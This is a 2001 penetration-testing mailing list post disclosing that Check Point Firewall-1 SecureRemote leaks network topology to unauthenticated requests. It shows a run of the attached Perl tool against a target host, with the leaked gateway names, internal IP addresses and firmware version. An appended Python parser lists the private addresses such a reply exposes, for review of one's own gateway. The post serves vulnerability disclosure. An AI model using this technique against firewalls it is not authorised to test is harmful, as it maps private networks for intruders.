Penetration Testing mailing list archives
Firewall-1 Information leak
From: Haroon Meer <haroon () sensepost com>
Date: Wed, 18 Jul 2001 03:17:10 +0200 (SAST)
Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including IP addresses, network masks (and even friendly
descriptions).

The attached file will connect to the firewall, and download the
topology (if SecureRemote is running).
(It is a tiny Perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting Windows> to test a
firewall-1.)
--snip--
SensePost# perl sr.pl firewall.victim.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.USKO_hal9000-196.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (196.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (196.3.167.186)
: (172.20.240.1)
: (196.3.170.1)
: (209.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")
) :name
(-SensePost-dotcom-.USKO_Neo196.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
Haroon Meer
+27 837866637
haroon () sensepost com
http://www.sensepost.com
Attachment: sr.pl
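An added example, not part of the original post or of sr.pl: a parser for the topology reply format shown in the output above, listing the RFC 1918 addresses a reply discloses so an administrator can review a capture taken from their own gateway. The sample is constructed (abridged from the quoted output, with parentheses balanced) and the function names are hypothetical.

```python
import ipaddress
import re

# Constructed sample: abridged from the output quoted in the post, parentheses balanced.
SAMPLE = """
:val ( :reply (
  : (-SensePost-dotcom-.USKO_hal9000-196.3.167.186
     :type (gateway) :fwver (4.1)
     :ipaddr (196.3.167.186) :ipmask (255.255.255.255)
     :ifaddrs ( : (196.3.167.186) : (172.20.240.1) : (196.3.170.1) )
     :keymanager ( :type (refobj) :refname ("#_-SensePost-dotcom-") ) )
  : (-SensePost-dotcom-.USKO_Neo196.3.167.189
     :type (gateway) :ipaddr (172.29.0.1) :ipmask (255.255.255.255) ) ) )
"""

TOKEN = re.compile(r'\(|\)|"[^"]*"|[^\s()]+')

def parse(text):
    """Turn ':key (atom :child (...))' text into (key, atom, children) tuples."""
    tokens, pos = TOKEN.findall(text), 0
    def entries():
        nonlocal pos
        out = []
        while pos < len(tokens) and tokens[pos].startswith(":"):
            if tokens[pos + 1:pos + 2] != ["("]:
                raise ValueError(f"missing '(' after {tokens[pos]!r}")
            key, atom, pos = tokens[pos][1:], None, pos + 2
            if pos < len(tokens) and tokens[pos][0] not in "():":
                atom, pos = tokens[pos].strip('"'), pos + 1
            children = entries()
            if pos < len(tokens) and tokens[pos] != ")":
                raise ValueError(f"unexpected token {tokens[pos]!r}")
            pos += 1  # closing ")", or the end of a truncated capture
            out.append((key, atom, children))
        return out
    return entries()

def leaked_addresses(nodes):
    """Yield every value that is an IP address; :ipmask values are masks, not hosts."""
    for key, atom, children in nodes:
        if atom and key != "ipmask":
            try:
                yield ipaddress.ip_address(atom)
            except ValueError:
                pass  # object names, versions, flags
        yield from leaked_addresses(children)

def internal_addresses(text):
    """Private (RFC 1918) addresses the topology reply discloses, de-duplicated."""
    return sorted({str(a) for a in leaked_addresses(parse(text)) if a.is_private})
```

Any address this returns for a reply obtained without authenticating is internal addressing the gateway hands out under the default setting the post describes.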
